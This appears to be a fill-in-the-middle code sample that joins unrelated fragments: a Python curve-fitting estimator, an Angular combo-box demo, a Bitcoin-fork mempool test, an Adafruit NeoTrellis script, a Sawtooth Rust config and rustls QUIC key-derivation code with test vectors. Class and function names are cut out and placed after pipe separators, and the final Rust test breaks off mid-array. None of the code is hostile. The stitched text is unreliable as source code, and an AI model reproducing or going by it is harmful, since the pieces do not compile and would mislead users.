crappyfilter,
mode="valid")
# make the derivative's peak have the same amplitude as the step
if max(y_deriv) > 0:
y_deriv = y_deriv * max(y) / max(y_deriv)
fittedpar, newcons = self.estimate_height_position_fwhm(
x[cutoff:-cutoff], y_deriv)
data_amplitude = max(y) - min(y)
# use parameters from largest gaussian found
if len(fittedpar):
npeaks = len(fittedpar) // 3
largest_index = 0
largest = [data_amplitude,
fittedpar[3 * largest_index + 1],
fittedpar[3 * largest_index + 2]]
for i in range(npeaks):
if fittedpar[3 * i] > largest[0]:
largest_index = i
largest = [data_amplitude,
fittedpar[3 * largest_index + 1],
fittedpar[3 * largest_index + 2]]
else:
# no peak was found
largest = [data_amplitude, # height
x[len(x)//2], # center: middle of x range
self.config["FwhmPoints"] * (x[1] - x[0])] # fwhm: default value
# Setup constraints
newcons = numpy.zeros((3, 3), numpy.float)
if not self.config['NoConstraintsFlag']:
# Setup height constraints
if self.config['PositiveHeightAreaFlag']:
newcons[0, 0] = CPOSITIVE
newcons[0, 1] = 0
newcons[0, 2] = 0
# Setup position constraints
if self.config['QuotedPositionFlag']:
newcons[1, 0] = CQUOTED
newcons[1, 1] = min(x)
newcons[1, 2] = max(x)
# Setup positive FWHM constraints
if self.config['PositiveFwhmFlag']:
newcons[2, 0] = CPOSITIVE
newcons[2, 1] = 0
newcons[2, 2] = 0
return largest, newcons
def estimate_slit(self, x, y):
"""Estimation of parameters for slit curves.
The function estimates stepup and stepdown parameters for the largest
steps, and uses them for calculating the center (middle between stepup
and stepdown), the height (maximum amplitude in data), the fwhm
(distance between the up- and down-step centers) and the beamfwhm
(average of FWHM for up- and down-step).
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each slit are:
*height, position, fwhm, beamfwhm* .
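In this implementation the final *position* and *fwhm* are then refined
from the background-subtracted data: the fwhm is taken as the width of
the region where the signal exceeds half of its maximum and the
position as the center of that region.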
"""
largestup, cons = self.estimate_stepup(x, y)
largestdown, cons = self.estimate_stepdown(x, y)
fwhm = numpy.fabs(largestdown[1] - largestup[1])
beamfwhm = 0.5 * (largestup[2] + largestdown[2])
beamfwhm = min(beamfwhm, fwhm / 10.0)
beamfwhm = max(beamfwhm, (max(x) - min(x)) * 3.0 / len(x))
y_minus_bg = y - self.strip_bg(y)
height = max(y_minus_bg)
i1 = numpy.nonzero(y_minus_bg >= 0.5 * height)[0]
xx = numpy.take(x, i1)
position = (xx[0] + xx[-1]) / 2.0
fwhm = xx[-1] - xx[0]
largest = [height, position, fwhm, beamfwhm]
cons = numpy.zeros((4, 3), numpy.float)
# Setup constraints
if not self.config['NoConstraintsFlag']:
# Setup height constraints
if self.config['PositiveHeightAreaFlag']:
cons[0, 0] = CPOSITIVE
cons[0, 1] = 0
cons[0, 2] = 0
# Setup position constraints
if self.config['QuotedPositionFlag']:
cons[1, 0] = CQUOTED
cons[1, 1] = min(x)
cons[1, 2] = max(x)
# Setup positive FWHM constraints
if self.config['PositiveFwhmFlag']:
cons[2, 0] = CPOSITIVE
cons[2, 1] = 0
cons[2, 2] = 0
# Setup positive BeamFWHM constraints
if self.config['PositiveFwhmFlag']:
cons[3, 0] = CPOSITIVE
cons[3, 1] = 0
cons[3, 2] = 0
return largest, cons
def estimate_stepup(self, x, y):
"""Estimation of parameters for a single step up curve.
The function estimates gaussian parameters for the derivative of
the data, takes the largest gaussian peak and uses its estimated
parameters to define the center of the step and its fwhm. The
estimated amplitude returned is simply ``max(y) - min(y)``.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each stepup are:
*height, centroid, fwhm* .
"""
crappyfilter = [0.25, 0.75, 0.0, -0.75, -0.25]
cutoff = len(crappyfilter) // 2
y_deriv = numpy.convolve(y, crappyfilter, mode="valid")
if max(y_deriv) > 0:
y_deriv = y_deriv * max(y) / max(y_deriv)
fittedpar, cons = self.estimate_height_position_fwhm(
x[cutoff:-cutoff], y_deriv)
# for height, use the full amplitude of the data (max - min)
data_amplitude = max(y) - min(y)
# find params of the largest gaussian found
if len(fittedpar):
npeaks = len(fittedpar) // 3
largest_index = 0
largest = [data_amplitude,
fittedpar[3 * largest_index + 1],
fittedpar[3 * largest_index + 2]]
for i in range(npeaks):
if fittedpar[3 * i] > largest[0]:
largest_index = i
largest = [fittedpar[3 * largest_index],
fittedpar[3 * largest_index + 1],
fittedpar[3 * largest_index + 2]]
else:
# no peak was found
largest = [data_amplitude, # height
x[len(x)//2], # center: middle of x range
self.config["FwhmPoints"] * (x[1] - x[0])] # fwhm: default value
newcons = numpy.zeros((3, 3), numpy.float)
# Setup constraints
if not self.config['NoConstraintsFlag']:
# Setup height constraints
if self.config['PositiveHeightAreaFlag']:
newcons[0, 0] = CPOSITIVE
newcons[0, 1] = 0
newcons[0, 2] = 0
# Setup position constraints
if self.config['QuotedPositionFlag']:
newcons[1, 0] = CQUOTED
newcons[1, 1] = min(x)
newcons[1, 2] = max(x)
# Setup positive FWHM constraints
if self.config['PositiveFwhmFlag']:
newcons[2, 0] = CPOSITIVE
newcons[2, 1] = 0
newcons[2, 2] = 0
return largest, newcons
def estimate_periodic_gauss(self, x, y):
"""Estimation of parameters for periodic gaussian curves:
*number of peaks, distance between peaks, height, position of the
first peak, fwhm*
The function detects all peaks, then computes the parameters in the
following way:
- *distance*: average of distances between detected peaks
- *height*: average height of detected peaks
- *fwhm*: fwhm of the highest peak (in number of samples) if
field ``'AutoFwhm'`` in :attr:`config` is ``True``, else take
the default value (field ``'FwhmPoints'`` in :attr:`config`)
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
"""
yscaling = self.config.get('Yscaling', 1.0)
if yscaling == 0:
yscaling = 1.0
bg = self.strip_bg(y)
if self.config['AutoFwhm']:
search_fwhm = guess_fwhm(y)
else:
search_fwhm = int(float(self.config['FwhmPoints']))
search_sens = float(self.config['Sensitivity'])
if search_fwhm < 3:
search_fwhm = 3
if search_sens < 1:
search_sens = 1
if len(y) > 1.5 * search_fwhm:
peaks = peak_search(yscaling * y, fwhm=search_fwhm,
sensitivity=search_sens)
else:
peaks = []
npeaks = len(peaks)
if not npeaks:
fittedpar = []
cons = numpy.zeros((len(fittedpar), 3), numpy.float)
return fittedpar, cons
fittedpar = [0.0, 0.0, 0.0, 0.0, 0.0]
# The number of peaks
fittedpar[0] = npeaks
# The separation between peaks in x units
delta = 0.0
height = 0.0
for i in range(npeaks):
height += y[int(peaks[i])] - bg[int(peaks[i])]
if i != npeaks - 1:
delta += (x[int(peaks[i + 1])] - x[int(peaks[i])])
# delta between peaks
if npeaks > 1:
fittedpar[1] = delta / (npeaks - 1)
# starting height
fittedpar[2] = height / npeaks
# position of the first peak
fittedpar[3] = x[int(peaks[0])]
# Estimate the fwhm
fittedpar[4] = search_fwhm
# setup constraints
cons = numpy.zeros((5, 3), numpy.float)
cons[0, 0] = CFIXED # the number of gaussians
if npeaks == 1:
cons[1, 0] = CFIXED # the delta between peaks
else:
cons[1, 0] = CFREE
j = 2
# Setup height area constraints
if not self.config['NoConstraintsFlag']:
if self.config['PositiveHeightAreaFlag']:
# POSITIVE = 1
cons[j, 0] = CPOSITIVE
cons[j, 1] = 0
cons[j, 2] = 0
j += 1
# Setup position constraints
if not self.config['NoConstraintsFlag']:
if self.config['QuotedPositionFlag']:
# QUOTED = 2
cons[j, 0] = CQUOTED
cons[j, 1] = min(x)
cons[j, 2] = max(x)
j += 1
# Setup positive FWHM constraints
if not self.config['NoConstraintsFlag']:
if self.config['PositiveFwhmFlag']:
# POSITIVE=1
cons[j, 0] = CPOSITIVE
cons[j, 1] = 0
cons[j, 2] = 0
j += 1
return fittedpar, cons
def configure(self, **kw):
"""Add new / unknown keyword arguments to :attr:`config`,
update entries in :attr:`config` if the parameter name is an existing
key.
:param kw: Dictionary of keyword arguments.
:return: Configuration dictionary :attr:`config`
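A minimal usage sketch, assuming ``fitfuns`` is an instance of this
class as used elsewhere in this module (the values are arbitrary)::

    cfg = fitfuns.configure(FwhmPoints=16, Sensitivity=3.25)

Matching against existing keys is case-insensitive, so passing
``fwhmpoints=16`` updates the existing ``'FwhmPoints'`` entry instead
of adding a new key.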
"""
if not kw.keys():
return self.config
for key in kw.keys():
notdone = 1
# take care of lower / upper case problems ...
for config_key in self.config.keys():
if config_key.lower() == key.lower():
self.config[config_key] = kw[key]
notdone = 0
if notdone:
self.config[key] = kw[key]
return self.config
fitf |
index.ts | import {default as avatar} from '!!file-loader!../../../../../assets/images/avatar.jpg';
import {Component} from '@angular/core';
import {FormControl} from '@angular/forms';
import {Observable, of, Subject} from 'rxjs';
import {delay, filter, startWith, switchMap} from 'rxjs/operators';
import {changeDetection} from '../../../../../change-detection-strategy';
import {encapsulation} from '../../../../../view-encapsulation';
class User {
constructor(
readonly firstName: string,
readonly lastName: string,
readonly avatarUrl: string | null = null,
) {}
toString(): string {
return `${this.firstName} ${this.lastName}`;
}
}
const databaseMockData: ReadonlyArray<User> = [
new User('Roman', 'Sedov', 'http://marsibarsi.me/images/1x1small.jpg'),
new User('Alex', 'Inkin', avatar),
];
@Component({
selector: 'tui-combo-box-example-1',
templateUrl: './index.html',
styleUrls: ['./index.less'],
changeDetection,
encapsulation,
})
export class | {
readonly search$ = new Subject<string>();
readonly items$: Observable<ReadonlyArray<User> | null> = this.search$.pipe(
filter(value => value !== null),
switchMap(search =>
this.serverRequest(search).pipe(startWith<ReadonlyArray<User> | null>(null)),
),
startWith(databaseMockData),
);
readonly testValue = new FormControl(null);
onSearchChange(searchQuery: string) {
this.search$.next(searchQuery);
}
/**
* Service request emulation
*/
private serverRequest(searchQuery: string): Observable<ReadonlyArray<User>> {
const result = databaseMockData.filter(
user =>
user.toString().toLowerCase().indexOf(searchQuery.toLowerCase()) !== -1,
);
return of(result).pipe(delay(Math.random() * 1000 + 500));
}
}
| TuiComboBoxExample1 |
p2p_mempool.py | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017 The AmlBitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test p2p mempool message.
Test that nodes are disconnected if they send mempool messages when bloom
filters are not enabled.
"""
from test_framework.mininode import *
from test_framework.test_framework import AmlBitcoinTestFramework
from test_framework.util import *
class P2PMempoolTests(AmlBitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [["-peerbloomfilters=0"]]
def | (self):
#connect a mininode
aTestNode = NodeConnCB()
node = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], aTestNode)
aTestNode.add_connection(node)
NetworkThread().start()
aTestNode.wait_for_verack()
#request mempool
aTestNode.send_message(msg_mempool())
aTestNode.wait_for_disconnect()
#mininode must be disconnected at this point
assert_equal(len(self.nodes[0].getpeerinfo()), 0)
if __name__ == '__main__':
P2PMempoolTests().main()
| run_test |
neotrellis_simpletest.py | # SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
import time
from board import SCL, SDA
import busio
from adafruit_neotrellis.neotrellis import NeoTrellis
# create the i2c object for the trellis
i2c_bus = busio.I2C(SCL, SDA)
# create the trellis
trellis = NeoTrellis(i2c_bus)
# some color definitions
OFF = (0, 0, 0)
RED = (255, 0, 0)
YELLOW = (255, 150, 0)
GREEN = (0, 255, 0)
CYAN = (0, 255, 255)
BLUE = (0, 0, 255)
PURPLE = (180, 0, 255)
# this will be called when button events are received
| # turn the LED on when a rising edge is detected
if event.edge == NeoTrellis.EDGE_RISING:
trellis.pixels[event.number] = CYAN
# turn the LED off when a falling edge is detected
elif event.edge == NeoTrellis.EDGE_FALLING:
trellis.pixels[event.number] = OFF
for i in range(16):
# activate rising edge events on all keys
trellis.activate_key(i, NeoTrellis.EDGE_RISING)
# activate falling edge events on all keys
trellis.activate_key(i, NeoTrellis.EDGE_FALLING)
# set all keys to trigger the blink callback
trellis.callbacks[i] = blink
# cycle the LEDs on startup
trellis.pixels[i] = PURPLE
time.sleep(0.05)
for i in range(16):
trellis.pixels[i] = OFF
time.sleep(0.05)
while True:
# call the sync function to call any triggered callbacks
trellis.sync()
# the trellis can only be read every 17 milliseconds or so
time.sleep(0.02) | def blink(event):
|
config.rs | /*
* Copyright 2018 Intel Corporation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* ------------------------------------------------------------------------------
*/
use std::env;
use std::path::{Path, PathBuf};
const DEFAULT_CONFIG_DIR: &str = "/etc/sawtooth";
const DEFAULT_LOG_DIR: &str = "/var/log/sawtooth";
const DEFAULT_DATA_DIR: &str = "/var/lib/sawtooth";
const DEFAULT_KEY_DIR: &str = "/etc/sawtooth/keys";
const DEFAULT_POLICY_DIR: &str = "/etc/sawtooth/policy";
const DEFAULT_BLOCKSTORE_FILENAME: &str = "block-00.lmdb";
pub struct PathConfig {
pub config_dir: PathBuf,
pub log_dir: PathBuf,
pub data_dir: PathBuf,
pub key_dir: PathBuf,
pub policy_dir: PathBuf,
}
pub fn | () -> PathConfig {
match env::var("SAWTOOTH_HOME") {
Ok(prefix) => PathConfig {
config_dir: Path::new(&prefix).join("etc"),
log_dir: Path::new(&prefix).join("logs"),
data_dir: Path::new(&prefix).join("data"),
key_dir: Path::new(&prefix).join("keys"),
policy_dir: Path::new(&prefix).join("policy"),
},
Err(_) => PathConfig {
config_dir: Path::new(DEFAULT_CONFIG_DIR).to_path_buf(),
log_dir: Path::new(DEFAULT_LOG_DIR).to_path_buf(),
data_dir: Path::new(DEFAULT_DATA_DIR).to_path_buf(),
key_dir: Path::new(DEFAULT_KEY_DIR).to_path_buf(),
policy_dir: Path::new(DEFAULT_POLICY_DIR).to_path_buf(),
},
}
}
pub fn get_blockstore_filename() -> String {
String::from(DEFAULT_BLOCKSTORE_FILENAME)
}
| get_path_config |
quic.rs | /// This module contains optional APIs for implementing QUIC TLS.
use crate::client::{ClientConfig, ClientSession};
use crate::error::TlsError;
use crate::key_schedule::hkdf_expand;
use crate::msgs::enums::{AlertDescription, ContentType, ProtocolVersion};
use crate::msgs::handshake::{ClientExtension, ServerExtension};
use crate::msgs::message::{Message, MessagePayload};
use crate::server::{ServerConfig, ServerSession, ServerSessionImpl};
use crate::session::{Protocol, SessionCommon};
use crate::suites::{BulkAlgorithm, SupportedCipherSuite, TLS13_AES_128_GCM_SHA256};
use std::sync::Arc;
use ring::{aead, hkdf};
use webpki;
/// Secrets used to encrypt/decrypt traffic
#[derive(Clone, Debug)]
pub(crate) struct Secrets {
/// Secret used to encrypt packets transmitted by the client
pub client: hkdf::Prk,
/// Secret used to encrypt packets transmitted by the server
pub server: hkdf::Prk,
}
impl Secrets {
fn local_remote(&self, is_client: bool) -> (&hkdf::Prk, &hkdf::Prk) {
if is_client {
(&self.client, &self.server)
} else {
(&self.server, &self.client)
}
}
}
/// Generic methods for QUIC sessions
pub trait QuicExt {
/// Return the TLS-encoded transport parameters for the session's peer.
fn get_quic_transport_parameters(&self) -> Option<&[u8]>;
/// Compute the keys for encrypting/decrypting 0-RTT packets, if available
fn get_0rtt_keys(&self) -> Option<DirectionalKeys>;
/// Consume unencrypted TLS handshake data.
///
/// Handshake data obtained from separate encryption levels should be supplied in separate calls.
fn read_hs(&mut self, plaintext: &[u8]) -> Result<(), TlsError>;
/// Emit unencrypted TLS handshake data.
///
/// When this returns `Some(_)`, the new keys must be used for future handshake data.
fn write_hs(&mut self, buf: &mut Vec<u8>) -> Option<Keys>;
/// Emit the TLS description code of a fatal alert, if one has arisen.
///
/// Check after `read_hs` returns `Err(_)`.
fn get_alert(&self) -> Option<AlertDescription>;
/// Compute the keys to use following a 1-RTT key update
///
/// Must not be called until the handshake is complete
fn next_1rtt_keys(&mut self) -> PacketKeySet;
}
impl QuicExt for ClientSession {
fn get_quic_transport_parameters(&self) -> Option<&[u8]> {
self.common
.quic
.params
.as_ref()
.map(|v| v.as_ref())
}
fn get_0rtt_keys(&self) -> Option<DirectionalKeys> {
Some(DirectionalKeys::new(
self.resumption_ciphersuite?,
self.common.quic.early_secret.as_ref()?,
))
}
fn read_hs(&mut self, plaintext: &[u8]) -> Result<(), TlsError> {
read_hs(&mut self.common, plaintext)?;
self.process_new_handshake_messages()
}
fn write_hs(&mut self, buf: &mut Vec<u8>) -> Option<Keys> {
write_hs(&mut self.common, buf)
}
fn get_alert(&self) -> Option<AlertDescription> {
self.common.quic.alert
}
fn next_1rtt_keys(&mut self) -> PacketKeySet {
next_1rtt_keys(&mut self.common)
}
}
impl QuicExt for ServerSession {
fn get_quic_transport_parameters(&self) -> Option<&[u8]> {
self.imp
.common
.quic
.params
.as_ref()
.map(|v| v.as_ref())
}
fn | (&self) -> Option<DirectionalKeys> {
Some(DirectionalKeys::new(
self.imp.common.get_suite()?,
self.imp
.common
.quic
.early_secret
.as_ref()?,
))
}
fn read_hs(&mut self, plaintext: &[u8]) -> Result<(), TlsError> {
read_hs(&mut self.imp.common, plaintext)?;
self.imp
.process_new_handshake_messages()
}
fn write_hs(&mut self, buf: &mut Vec<u8>) -> Option<Keys> {
write_hs(&mut self.imp.common, buf)
}
fn get_alert(&self) -> Option<AlertDescription> {
self.imp.common.quic.alert
}
fn next_1rtt_keys(&mut self) -> PacketKeySet {
next_1rtt_keys(&mut self.imp.common)
}
}
/// Keys used to communicate in a single direction
pub struct DirectionalKeys {
/// Encrypts or decrypts a packet's headers
pub header: aead::quic::HeaderProtectionKey,
/// Encrypts or decrypts the payload of a packet
pub packet: PacketKey,
}
impl DirectionalKeys {
fn new(suite: &'static SupportedCipherSuite, secret: &hkdf::Prk) -> Self {
let hp_alg = match suite.bulk {
BulkAlgorithm::AES_128_GCM => &aead::quic::AES_128,
BulkAlgorithm::AES_256_GCM => &aead::quic::AES_256,
BulkAlgorithm::CHACHA20_POLY1305 => &aead::quic::CHACHA20,
};
Self {
header: hkdf_expand(secret, hp_alg, b"quic hp", &[]),
packet: PacketKey::new(suite, secret),
}
}
}
/// Keys to encrypt or decrypt the payload of a packet
pub struct PacketKey {
/// Encrypts or decrypts a packet's payload
pub key: aead::LessSafeKey,
/// Computes unique nonces for each packet
pub iv: Iv,
}
impl PacketKey {
fn new(suite: &'static SupportedCipherSuite, secret: &hkdf::Prk) -> Self {
Self {
key: aead::LessSafeKey::new(hkdf_expand(
secret,
suite.aead_algorithm,
b"quic key",
&[],
)),
iv: hkdf_expand(secret, IvLen, b"quic iv", &[]),
}
}
}
/// Packet protection keys for bidirectional 1-RTT communication
pub struct PacketKeySet {
/// Encrypts outgoing packets
pub local: PacketKey,
/// Decrypts incoming packets
pub remote: PacketKey,
}
/// Computes unique nonces for each packet
pub struct Iv([u8; aead::NONCE_LEN]);
impl Iv {
/// Compute the nonce to use for encrypting or decrypting `packet_number`
pub fn nonce_for(&self, packet_number: u64) -> ring::aead::Nonce {
let mut out = [0; aead::NONCE_LEN];
out[4..].copy_from_slice(&packet_number.to_be_bytes());
for (out, inp) in out.iter_mut().zip(self.0.iter()) {
*out ^= inp;
}
aead::Nonce::assume_unique_for_key(out)
}
}
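// Illustration of the construction in `nonce_for` above: the 64-bit packet
// number is written big-endian into the last 8 bytes of a zeroed 12-byte
// buffer and XORed byte-wise with the IV, i.e. nonce[i] = iv[i] ^ pn_bytes[i]
// for i in 0..12 (`pn_bytes` being an illustrative name for that buffer).
// For example, packet number 1 differs from the raw IV only in its last byte.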
impl From<hkdf::Okm<'_, IvLen>> for Iv {
fn from(okm: hkdf::Okm<IvLen>) -> Self {
let mut iv = [0; aead::NONCE_LEN];
okm.fill(&mut iv[..]).unwrap();
Iv(iv)
}
}
struct IvLen;
impl hkdf::KeyType for IvLen {
fn len(&self) -> usize {
aead::NONCE_LEN
}
}
/// Complete set of keys used to communicate with the peer
pub struct Keys {
/// Encrypts outgoing packets
pub local: DirectionalKeys,
/// Decrypts incoming packets
pub remote: DirectionalKeys,
}
impl Keys {
/// Construct keys for use with initial packets
pub fn initial(
initial_salt: &hkdf::Salt,
client_dst_connection_id: &[u8],
is_client: bool,
) -> Self {
const CLIENT_LABEL: &[u8] = b"client in";
const SERVER_LABEL: &[u8] = b"server in";
let hs_secret = initial_salt.extract(client_dst_connection_id);
let secrets = Secrets {
client: hkdf_expand(&hs_secret, hkdf::HKDF_SHA256, CLIENT_LABEL, &[]),
server: hkdf_expand(&hs_secret, hkdf::HKDF_SHA256, SERVER_LABEL, &[]),
};
Self::new(&TLS13_AES_128_GCM_SHA256, is_client, &secrets)
}
fn new(suite: &'static SupportedCipherSuite, is_client: bool, secrets: &Secrets) -> Self {
let (local, remote) = secrets.local_remote(is_client);
Keys {
local: DirectionalKeys::new(suite, local),
remote: DirectionalKeys::new(suite, remote),
}
}
}
fn read_hs(this: &mut SessionCommon, plaintext: &[u8]) -> Result<(), TlsError> {
if this
.handshake_joiner
.take_message(Message {
typ: ContentType::Handshake,
version: ProtocolVersion::TLSv1_3,
payload: MessagePayload::new_opaque(plaintext.into()),
})
.is_none()
{
this.quic.alert = Some(AlertDescription::DecodeError);
return Err(TlsError::CorruptMessage);
}
Ok(())
}
fn write_hs(this: &mut SessionCommon, buf: &mut Vec<u8>) -> Option<Keys> {
while let Some((_, msg)) = this.quic.hs_queue.pop_front() {
buf.extend_from_slice(&msg);
if let Some(&(true, _)) = this.quic.hs_queue.front() {
if this.quic.hs_secrets.is_some() {
// Allow the caller to switch keys before proceeding.
break;
}
}
}
if let Some(secrets) = this.quic.hs_secrets.take() {
return Some(Keys::new(this.get_suite_assert(), this.is_client, &secrets));
}
if let Some(secrets) = this.quic.traffic_secrets.as_ref() {
if !this.quic.returned_traffic_keys {
this.quic.returned_traffic_keys = true;
return Some(Keys::new(this.get_suite_assert(), this.is_client, &secrets));
}
}
None
}
fn next_1rtt_keys(this: &mut SessionCommon) -> PacketKeySet {
let hkdf_alg = this.get_suite_assert().hkdf_algorithm;
let secrets = this
.quic
.traffic_secrets
.as_ref()
.expect("traffic keys not yet available");
let next = next_1rtt_secrets(hkdf_alg, secrets);
let (local, remote) = next.local_remote(this.is_client);
let keys = PacketKeySet {
local: PacketKey::new(this.get_suite_assert(), local),
remote: PacketKey::new(this.get_suite_assert(), remote),
};
this.quic.traffic_secrets = Some(next);
keys
}
fn next_1rtt_secrets(hkdf_alg: hkdf::Algorithm, prev: &Secrets) -> Secrets {
Secrets {
client: hkdf_expand(&prev.client, hkdf_alg, b"quic ku", &[]),
server: hkdf_expand(&prev.server, hkdf_alg, b"quic ku", &[]),
}
}
/// Methods specific to QUIC client sessions
pub trait ClientQuicExt {
/// Make a new QUIC ClientSession. This differs from `ClientSession::new()`
/// in that it takes an extra argument, `params`, which contains the
/// TLS-encoded transport parameters to send.
fn new_quic(
config: &Arc<ClientConfig>,
quic_version: Version,
hostname: webpki::DNSNameRef,
params: Vec<u8>,
) -> Result<ClientSession, TlsError> {
assert!(
config
.versions
.iter()
.all(|x| x.get_u16() >= ProtocolVersion::TLSv1_3.get_u16()),
"QUIC requires TLS version >= 1.3"
);
let ext = match quic_version {
Version::V1Draft => ClientExtension::TransportParametersDraft(params),
Version::V1 => ClientExtension::TransportParameters(params),
};
let mut session = ClientSession::from_config(config);
session.common.protocol = Protocol::Quic;
session.start_handshake(hostname.into(), vec![ext])?;
Ok(session)
}
}
impl ClientQuicExt for ClientSession {}
/// Methods specific to QUIC server sessions
pub trait ServerQuicExt {
/// Make a new QUIC ServerSession. This differs from `ServerSession::new()`
/// in that it takes an extra argument, `params`, which contains the
/// TLS-encoded transport parameters to send.
fn new_quic(
config: &Arc<ServerConfig>,
quic_version: Version,
params: Vec<u8>,
) -> ServerSession {
assert!(
config
.versions
.iter()
.all(|x| x.get_u16() >= ProtocolVersion::TLSv1_3.get_u16()),
"QUIC requires TLS version >= 1.3"
);
assert!(
config.max_early_data_size == 0 || config.max_early_data_size == 0xffff_ffff,
"QUIC sessions must set a max early data of 0 or 2^32-1"
);
let ext = match quic_version {
Version::V1Draft => ServerExtension::TransportParametersDraft(params),
Version::V1 => ServerExtension::TransportParameters(params),
};
let mut imp = ServerSessionImpl::new(config, vec![ext]);
imp.common.protocol = Protocol::Quic;
ServerSession { imp }
}
}
impl ServerQuicExt for ServerSession {}
/// QUIC protocol version
///
/// Governs version-specific behavior in the TLS layer
#[non_exhaustive]
pub enum Version {
/// Draft versions prior to V1
V1Draft,
/// First stable RFC
V1,
}
#[cfg(test)]
mod test {
use super::*;
#[test]
fn initial_keys_test_vectors() {
// Test vectors based on draft 27
const INITIAL_SALT: [u8; 20] = [
0xc3, 0xee, 0xf7, 0x12, 0xc7, 0x2e, 0xbb, 0x5a, 0x11, 0xa7, 0xd2, 0x43, 0x2b, 0xb4,
0x63, 0x65, 0xbe, 0xf9, 0xf5, 0x02,
];
const CONNECTION_ID: &[u8] = &[0x83, 0x94, 0xc8, 0xf0, 0x3e, 0x51, 0x57, 0x08];
const PACKET_NUMBER: u64 = 42;
let initial_salt = hkdf::Salt::new(hkdf::HKDF_SHA256, &INITIAL_SALT);
let server_keys = Keys::initial(&initial_salt, &CONNECTION_ID, false);
let client_keys = Keys::initial(&initial_salt, &CONNECTION_ID, true);
// Nonces
const SERVER_NONCE: [u8; 12] = [
0x5e, 0x5a, 0xe6, 0x51, 0xfd, 0x1e, 0x84, 0x95, 0xaf, 0x13, 0x50, 0xa1,
];
assert_eq!(
server_keys
.local
.packet
.iv
.nonce_for(PACKET_NUMBER)
.as_ref(),
&SERVER_NONCE
);
assert_eq!(
client_keys
.remote
.packet
.iv
.nonce_for(PACKET_NUMBER)
.as_ref(),
&SERVER_NONCE
);
const CLIENT_NONCE: [u8; 12] = [
0x86, 0x81, 0x35, 0x94, 0x10, 0xa7, 0x0b, 0xb9, 0xc9, 0x2f, 0x04, 0x0a,
];
assert_eq!(
server_keys
.remote
.packet
.iv
.nonce_for(PACKET_NUMBER)
.as_ref(),
&CLIENT_NONCE
);
assert_eq!(
client_keys
.local
.packet
.iv
.nonce_for(PACKET_NUMBER)
.as_ref(),
&CLIENT_NONCE
);
// Header encryption mask
const SAMPLE: &[u8] = &[
0x70, 0x02, 0x59, 0x6f, 0x99, 0xae, 0x67, 0xab, 0xf6, 0x5a, 0x58, 0x52, 0xf5, 0x4f,
0x58, 0xc3,
];
const SERVER_MASK: [u8; 5] = [0x38, 0x16, 0x8a, 0x0c, 0x25];
assert_eq!(
server_keys
.local
.header
.new_mask(SAMPLE)
.unwrap(),
SERVER_MASK
);
assert_eq!(
client_keys
.remote
.header
.new_mask(SAMPLE)
.unwrap(),
SERVER_MASK
);
const CLIENT_MASK: [u8; 5] = [0xae, 0x96, 0x2e, 0x67, 0xec];
assert_eq!(
server_keys
.remote
.header
.new_mask(SAMPLE)
.unwrap(),
CLIENT_MASK
);
assert_eq!(
client_keys
.local
.header
.new_mask(SAMPLE)
.unwrap(),
CLIENT_MASK
);
const AAD: &[u8] = &[
0xc9, 0xff, 0x00, 0x00, 0x1b, 0x00, 0x08, 0xf0, 0x67, 0xa5, 0x50, 0x2a, 0x42, 0x62,
0xb5, 0x00, 0x40, 0x74, 0x16, 0x8b,
];
let aad = aead::Aad::from(AAD);
const PLAINTEXT: [u8; 12] = [
0x0d, 0x00, 0x00, 0x00, 0x00, 0x18, 0x41, 0x0a, 0x02, 0x00, 0x00, 0x56,
];
let mut payload = PLAINTEXT;
let server_nonce = server_keys
.local
.packet
.iv
.nonce_for(PACKET_NUMBER);
let tag = server_keys
.local
.packet
.key
.seal_in_place_separate_tag(server_nonce, aad, &mut payload)
.unwrap();
assert_eq!(
payload,
[
0x0d, 0x91, 0x96, 0x31, 0xc0, 0xeb, 0x84, 0xf2, 0x88, 0x59, 0xfe, 0xc0
]
);
assert_eq!(
tag.as_ref(),
&[
0xdf, 0xee, 0x06, 0x81, 0x9e, 0x7a, 0x08, 0x34, 0xe4, 0x94, 0x19, 0x79, 0x5f, 0xe0,
0xd7, 0x3f
]
);
let aad = aead::Aad::from(AAD);
let mut payload = PLAINTEXT;
let client_nonce = client_keys
.local
.packet
.iv
.nonce_for(PACKET_NUMBER);
let tag = client_keys
.local
.packet
.key
.seal_in_place_separate_tag(client_nonce, aad, &mut payload)
.unwrap();
assert_eq!(
payload,
[
0x89, 0x6c, 0x66, 0x91, 0xe0, 0x9f, 0x47, 0x7a, 0x91, 0x42, 0xa4, 0x46
]
);
assert_eq!(
tag.as_ref(),
&[
0xb6, 0xff, 0xef, 0x89, 0xd5, 0xcb, 0x53, 0xd0, 0x98, 0xf7, 0x40, 0xa, 0x8d, 0x97,
0x72, 0x6e
]
);
}
#[test]
fn key_update_test_vector() {
fn equal_prk(x: &hkdf::Prk, y: &hkdf::Prk) -> bool {
let mut x_data = [0; 16];
let mut y_data = [0; 16];
let x_okm = x
.expand(&[b"info"], &aead::quic::AES_128)
.unwrap();
x_okm.fill(&mut x_data[..]).unwrap();
let y_okm = y
.expand(&[b"info"], &aead::quic::AES_128)
.unwrap();
y_okm.fill(&mut y_data[..]).unwrap();
x_data == y_data
}
let initial = Secrets {
// Constant dummy values for reproducibility
client: hkdf::Prk::new_less_safe(
hkdf::HKDF_SHA256,
&[
0xb8, 0x76, 0x77, 0x08, 0xf8, 0x77, 0x23, 0x58, 0xa6, 0xea, 0x9f, 0xc4, 0x3e,
